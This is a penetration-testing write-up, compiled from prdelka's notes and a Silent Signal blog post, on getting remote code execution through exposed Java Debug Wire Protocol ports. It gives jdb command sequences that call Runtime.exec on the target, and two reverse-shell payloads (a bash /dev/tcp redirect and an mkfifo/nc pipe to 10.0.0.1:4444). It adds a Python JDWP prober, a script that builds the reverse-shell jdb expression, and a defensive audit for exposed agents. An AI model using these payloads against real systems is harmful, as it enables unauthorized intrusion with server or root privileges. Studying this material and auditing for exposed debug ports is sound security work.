Java debug penetration testing

Introduction (sources):
http://blog.silentsignal.eu/2014/02/09/jdb-tricks-hacking-java-debug-wire/
http://pki.fedoraproject.org/wiki/Debugging_Dogtag
http://wiki.jerrypeng.me/source-notes-jetty.html
JDWP Arbitrary Java Code Execution Exploitation
===============================================
Java Debugging Wire Protocol (JDWP) is the low-level protocol used for
communication between a debugger and a Java Virtual Machine (JVM), as outlined in
the Java Platform Debugger Architecture (JPDA). It is often used to facilitate
remote debugging of a JVM over TCP/IP and can be identified by the initial
protocol handshake: the ASCII string "JDWP-Handshake", sent first by the client
and echoed back by the server. JDWP has no authentication of its own, so anyone
who can complete the handshake gets full debugger control of the JVM. "jdb" is
the simple command-line JDWP debugger included in the Oracle JDK and OpenJDK and
can be used to interact with remote JDWP-capable services. The service typically
listens on TCP port 8000, but it can be found on arbitrary TCP ports and is
sometimes left enabled inadvertently on servers running Java services. Since a
debugger may instantiate classes and invoke methods inside the debuggee, jdb is
enough to execute arbitrary Java code in a remote JVM. The example shown here
outlines how to leverage this weakness to execute arbitrary host OS commands in
the context of the JVM.

$ jdb -attach x.x.x.x:8000
Set uncaught java.lang.Throwable
Set deferred uncaught java.lang.Throwable
Initializing jdb ...
> 
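
The handshake described above can also be checked without attaching a debugger. As an added example (not code from prdelka's write-up or from Silent Signal), the Python script below completes the "JDWP-Handshake" exchange and then sends the VirtualMachine/Version command (command set 1, command 1), so a suspected listener can be confirmed and the remote JVM version read before any jdb session. The fake_server() is a constructed stand-in for the target so the script runs offline; its version strings and the 127.0.0.1 target are assumptions.

```python
"""Fingerprint a JDWP listener without jdb: complete the "JDWP-Handshake" and
send VirtualMachine/Version (command set 1, command 1).

Added example for this page, not code from prdelka's or Silent Signal's write-ups.
The fake server below is a constructed stand-in for a remote JVM so the script
runs offline; its version strings are made up."""
import socket
import struct
import threading

HANDSHAKE = b"JDWP-Handshake"
CMDSET_VM, CMD_VERSION = 1, 1
REPLY_FLAG = 0x80


def _recv_exact(sock, n):
    """Read exactly n bytes or raise ConnectionError if the peer closes first."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection early")
        buf += chunk
    return buf


def _read_string(data, off):
    """JDWP string: 4-byte big-endian length followed by UTF-8 bytes."""
    (n,) = struct.unpack_from(">I", data, off)
    return data[off + 4:off + 4 + n].decode("utf-8"), off + 4 + n


def probe_jdwp(host, port, timeout=3.0):
    """Return None if the peer does not answer the handshake like a JVM debug
    agent; otherwise a dict with the Version reply fields. Connection errors
    (closed port, unreachable host) propagate as OSError."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(HANDSHAKE)
        try:
            if _recv_exact(s, len(HANDSHAKE)) != HANDSHAKE:
                return None
            # Command packet header: length, id, flags, command set, command.
            pkt_id = 1
            s.sendall(struct.pack(">IIBBB", 11, pkt_id, 0, CMDSET_VM, CMD_VERSION))
            # Reply header: length, id, flags (0x80 marks a reply), error code.
            length, rid, flags, err = struct.unpack(">IIBH", _recv_exact(s, 11))
            if rid != pkt_id or flags != REPLY_FLAG or err != 0:
                return None
            body = _recv_exact(s, length - 11)
        except OSError:
            return None
    desc, off = _read_string(body, 0)
    major, minor = struct.unpack_from(">II", body, off)
    vm_version, off = _read_string(body, off + 8)
    vm_name, _ = _read_string(body, off)
    return {"description": desc, "jdwp_major": major, "jdwp_minor": minor,
            "vm_version": vm_version, "vm_name": vm_name}


def _jdwp_string(text):
    raw = text.encode("utf-8")
    return struct.pack(">I", len(raw)) + raw


def fake_server(jdwp=True):
    """Constructed stand-in for the target. jdwp=True mimics a debug agent;
    jdwp=False mimics an unrelated service that sends its own banner."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def handle():
        conn, _ = srv.accept()
        with srv, conn:
            conn.settimeout(3.0)
            try:
                got = _recv_exact(conn, len(HANDSHAKE))
                if not jdwp or got != HANDSHAKE:
                    conn.sendall(b"SSH-2.0-constructed-banner\r\n")
                    return
                conn.sendall(HANDSHAKE)
                _, pkt_id, _, cmdset, cmd = struct.unpack(">IIBBB", _recv_exact(conn, 11))
                if (cmdset, cmd) != (CMDSET_VM, CMD_VERSION):
                    return
                body = (_jdwp_string("Java Debug Wire Protocol (constructed) version 1.8")
                        + struct.pack(">II", 1, 8)
                        + _jdwp_string("1.8.0")
                        + _jdwp_string("Constructed HotSpot VM"))
                conn.sendall(struct.pack(">IIBH", 11 + len(body), pkt_id, REPLY_FLAG, 0) + body)
            except OSError:
                pass

    threading.Thread(target=handle, daemon=True).start()
    return port


if __name__ == "__main__":
    import sys
    target = (sys.argv[1], int(sys.argv[2])) if len(sys.argv) == 3 else ("127.0.0.1", fake_server())
    print(probe_jdwp(*target))
```

Run it as `python probe.py host port` against a real target; with no arguments it probes its own fake server. A result of None means the port answered but not with the JDWP handshake (for example an HTTP or SSH service), while a refused connection raises OSError.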

Information leaks through the "classpath" command reveal details of the remote
OS platform (here a Windows base directory) and of the Java installation and the
libraries loaded in the JVM.

> classpath
base directory: C:\Windows\system32
classpath: [ ** MASKED ** list of jar's loaded in remote JVM ]
bootclasspath: [ ** MASKED ** list of JRE paths ]
> 

jdb is capable of performing remote object creation and method invocation from
within the CLI using the "print", "dump" and "eval" commands together with the
"new" keyword. To determine the classes and methods available, use "classes"
(which lists the classes the remote JVM has loaded) and then "methods" on the
corresponding class.

> classes
...
java.lang.Runtime
...
> methods java.lang.Runtime
...
java.lang.Runtime exec(java.lang.String[])
...

It is often necessary to set the jdb context to a suspended thread, i.e. to stop
at a breakpoint, before attempting to create a new remote object, because the
expression evaluator needs a suspended thread in which to run constructors and
methods. "trace go methods" can be used to identify a method the application
calls regularly as a candidate for a breakpoint, and then "stop in
your.random.class.method()" halts the next thread that executes it. Once
execution has halted you can use "print new" to create your object and invoke
methods, as in the following example.

Breakpoint hit: "thread=threadname",your.random.class.method(), line=745 bci=0
threadname[1] print new java.lang.Runtime().exec("cmd.exe /c dir")
new java.lang.Runtime().exec("cmd.exe /c dir") = "java.lang.ProcessImpl@918502"
threadname[1] cont
> 

Exploitation success is determined from the output of the jdb process: functions
returning "null" or errors about an unsuspended thread state indicate that
exploitation was unsuccessful, whereas in the example above the JVM created a
new object, "java.lang.ProcessImpl@918502", indicating that "cmd.exe /c dir"
was executed. Note that exec() returns as soon as the process is spawned and its
output is not shown; see the Silent Signal notes further down for reading it
back. On Linux the returned object may be reported as java.lang.UNIXProcess
instead, and if the constructor form fails, the static accessor
"java.lang.Runtime.getRuntime().exec()" is the alternative; consult the class
and method enumeration when attempting to exploit this flaw.


Your Java code runs with the privileges of the JVM process; this has been
identified on services running as both "root" (*nix) and "SYSTEM" (win32) in the
wild.


 -- prdelka
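
Since the write-up above stresses that JDWP is usually found enabled by accident, and often under a privileged account, here is the check a defender would run on their own hosts. It is an added example, not part of prdelka's text: it parses JVM command lines for the -agentlib:jdwp and legacy -Xrunjdwp options and reports the agents that listen beyond loopback, together with the user they run as. The process list SAMPLE_PS is constructed; the JDK 9 change in the default binding (a bare port binds loopback only from JDK 9 on, "*:port" binds every interface) is as documented in the JDK 9 release notes.

```python
"""Spot JVMs that were started with a JDWP agent listening beyond loopback.

Added example, not from the original write-up. SAMPLE_PS is a constructed
`ps -eo user,pid,args` excerpt; on a real host feed it the actual ps output."""
import re

# Both spellings of the agent option: -agentlib:jdwp=... (JDK 5+) and the
# legacy -Xdebug -Xrunjdwp:... form.
_JDWP_OPT = re.compile(r"-(?:agentlib:jdwp=|Xrunjdwp:)(\S+)")
_LOOPBACK = {"localhost", "127.0.0.1"}   # IPv6 literals are not handled here


def parse_jdwp_options(cmdline):
    """Return the agent's key=value options as a dict, or None if no JDWP agent."""
    m = _JDWP_OPT.search(cmdline)
    if not m:
        return None
    opts = {}
    for kv in m.group(1).split(","):
        key, _, value = kv.partition("=")
        opts[key] = value
    return opts


def jdwp_exposure(opts, jdk_major):
    """Classify a JDWP agent: 'client' (the JVM dials out to a debugger, nothing
    listens), 'local' (loopback or shared memory only) or 'network' (reachable
    from other hosts, the situation the write-up exploits)."""
    if opts.get("transport") != "dt_socket":
        return "local"                      # dt_shmem is same-host only
    if opts.get("server", "n") != "y":
        return "client"
    host, sep, _port = opts.get("address", "").rpartition(":")
    if not sep:                             # bare port, or no address at all
        # Before JDK 9 this bound every interface; since JDK 9 loopback only.
        return "local" if jdk_major >= 9 else "network"
    if host == "*":
        return "network"
    return "local" if host in _LOOPBACK else "network"


def audit_processes(ps_lines, jdk_major):
    """(user, pid, address) for every process whose JDWP agent is network-reachable."""
    findings = []
    for line in ps_lines:
        user, pid, cmd = line.split(None, 2)
        opts = parse_jdwp_options(cmd)
        if opts and jdwp_exposure(opts, jdk_major) == "network":
            findings.append((user, int(pid), opts.get("address", "")))
    return findings


SAMPLE_PS = [  # constructed sample, not captured from a real system
    "root 1201 java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=8000 -jar app.jar",
    "tomcat 1340 java -Xdebug -Xrunjdwp:transport=dt_socket,server=y,address=localhost:5005 -cp lib/* Main",
    "app 1412 java -agentlib:jdwp=transport=dt_socket,server=y,address=*:5005 -jar api.jar",
    "app 1503 java -agentlib:jdwp=transport=dt_socket,server=n,address=10.0.0.5:5005 -jar worker.jar",
    "app 1604 java -jar clean.jar",
]

if __name__ == "__main__":
    for user, pid, address in audit_processes(SAMPLE_PS, jdk_major=8):
        print(f"{user}\t{pid}\tJDWP listening on {address}")
```

The jdk_major parameter matters: the same `address=8000` line is a finding on a JDK 8 host (the root-owned process above) and harmless on JDK 11, where only the explicit `*:5005` listener remains exposed.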

JDB tricks: hacking Java Debug Wire (Silent Signal, 2014-02-09)
===============================================================

During a recent project we found a Java Debug Wire Protocol interface open at a server. I was a bit surprised when I was able to attach to it using JDB, the Java debugger – this was too easy. Or was it?

Prdelka has a pretty decent write-up on the exploitation over JDWP: you can basically instantiate any class available in the target JVM (jdb's -D and -classpath options are only forwarded to a debuggee that jdb itself launches, so they do not alter the classpath of a JVM you attach to), and luckily you can also directly call the exec() method of the java.lang.Runtime class, practically achieving remote code execution. It goes like this:

print new java.lang.Runtime().exec("ls")
 new java.lang.Runtime().exec("ls") = "java.lang.UNIXProcess@481adc30"

Well, that’s great, how about getting the output back or even an interactive shell maybe? That’s when things go painfully Java.

If you open the documentation of JDB you don't see too many features to work with: a handful of commands, no scripting support and, as it turns out, the expression syntax is also undocumented.

After a bit of experimenting you'll find that although you can instantiate classes and call their methods, there is no easy way of storing the actual object instances (the expression language offers nothing like a local variable), which is pretty bad since Java requires a ton of boilerplate code for pretty much every basic operation. For example, getting back one line of exec() output looks like this:

print new java.lang.String(new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.Runtime().exec("id").getInputStream())).readLine())
 new java.lang.String(new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.Runtime().exec("id").getInputStream())).readLine()) = "uid=1000(b) gid=1000(b) groups=1000(b)"

Still, I couldn't figure out a way to put this whole thing in a loop to read more lines. What about getting a reverse shell and getting rid of all the InputStream handling? Netcat was available on the target but without the -e option (aka GAPING_SECURITY_HOLE) enabled. There are of course a ton of other options to achieve the same result, but they all require either shell stream redirection or at least quoting. Since Runtime.exec(String) only splits the command on whitespace (with a java.util.StringTokenizer, which knows nothing about quotes) and passes the tokens directly to the OS, shell syntax doesn't work immediately, and quotation marks are also handled in a rather weird way by the jdb shell, so things like exec("bash -c \"your > command\"") don't work as expected.

One possible solution to overcome these limitations is to write out a shell script and then invoke it:

print new java.io.PrintWriter(new java.io.PrintWriter("/tmp/S2.sh"),true).println("bash -i >& /dev/tcp/10.0.0.1/4444 0>&1")

Note that since you can't close() the PrintWriter instance you have to enable automatic flushing, which actually requires the PrintWriter to be wrapped in another one (only the Writer- and OutputStream-based constructors take the autoFlush flag; the file-name constructor doesn't). The script can then be started with a plain exec("bash /tmp/S2.sh").

The more elegant solution is to use the Runtime.exec(String[]) interface and let the API take care of the quoting: each array element becomes one argument, so the shell command can be passed verbatim as the third element. The problem is that it seems you can't simply declare an array in the jdb shell. Luckily though, you can invoke the split() method on a freshly instantiated String object, using a separator that doesn't occur anywhere in the command:

print new java.lang.Runtime().exec(new java.lang.String("bashS2-cS2mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f").split("S2"))
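
The quoting problem and the split() trick above both come down to how Runtime.exec() tokenizes its argument. As an added example, not code from the Silent Signal post, this Python module reproduces the tokenization the String form applies in Java (java.util.StringTokenizer with its default delimiters " \t\n\r\f", no quote handling), and builds the split()-based jdb expression for the String[] form, including the check that the separator occurs in none of the arguments. The separator candidates beyond "S2" are my own choices.

```python
"""Why shell syntax dies inside Runtime.exec(String), and how the String.split()
trick gets a proper argument vector through jdb.

Added example, not code from the Silent Signal post. java_exec_tokens()
re-implements in Python the tokenisation that Runtime.exec(String) applies in
Java (java.util.StringTokenizer with its default delimiters " \\t\\n\\r\\f");
the separator candidates and sample commands are my own choices."""
import re

_JAVA_WS = re.compile(r"[ \t\n\r\f]+")


def java_exec_tokens(command):
    """Argument vector Runtime.exec(String) hands to the OS: the command is split
    on the StringTokenizer whitespace set and quotes are ordinary characters, so
    "bash -c \"...\"" arrives as many arguments, not three."""
    return [tok for tok in _JAVA_WS.split(command) if tok]


def pick_separator(argv, candidates=("S2", "Q7", "ZX9")):
    """First alphanumeric candidate absent from every argument. Alphanumeric
    matters because Java's String.split takes a regex and would interpret
    metacharacters such as '|' or '.'."""
    for sep in candidates:
        if not any(sep in arg for arg in argv):
            return sep
    raise ValueError("every candidate separator occurs inside an argument")


def jdb_exec_expression(argv, sep=None):
    """jdb `print` line running argv through Runtime.exec(String[]). jdb's
    expression syntax has no array literals, so the vector is built by
    splitting one String literal on a separator the JVM removes again."""
    sep = sep or pick_separator(argv)
    if not sep.isalnum():
        raise ValueError("separator must be alphanumeric")
    if any(sep in arg for arg in argv):
        raise ValueError(f"separator {sep!r} occurs inside an argument")
    if any(ch in arg for arg in argv for ch in '"\\'):
        raise ValueError("double quotes and backslashes would end or escape the Java string literal")
    joined = sep.join(argv)
    return (f'print new java.lang.Runtime().exec('
            f'new java.lang.String("{joined}").split("{sep}"))')


if __name__ == "__main__":
    shell_cmd = "mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f"
    # String form: the shell command is shredded into whitespace tokens.
    print(java_exec_tokens(f'bash -c "{shell_cmd}"'))
    # String[] form via split(): bash, -c and the whole command as one argument.
    print(jdb_exec_expression(["bash", "-c", shell_cmd]))
```

Comparing the two outputs shows why the first attempts failed: the String form hands bash a dozen separate arguments and the redirections never reach a shell, whereas the split() expression delivers exactly the three-element vector that the blog's reverse shell needs.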

So we successfully got our interactive shell with the privileges of the application server. Also, by this time PZ got root in a totally different way on the same server, more about that in a later post :)

If you know other useful tricks for JDB, don’t hesitate to share it in the comments!
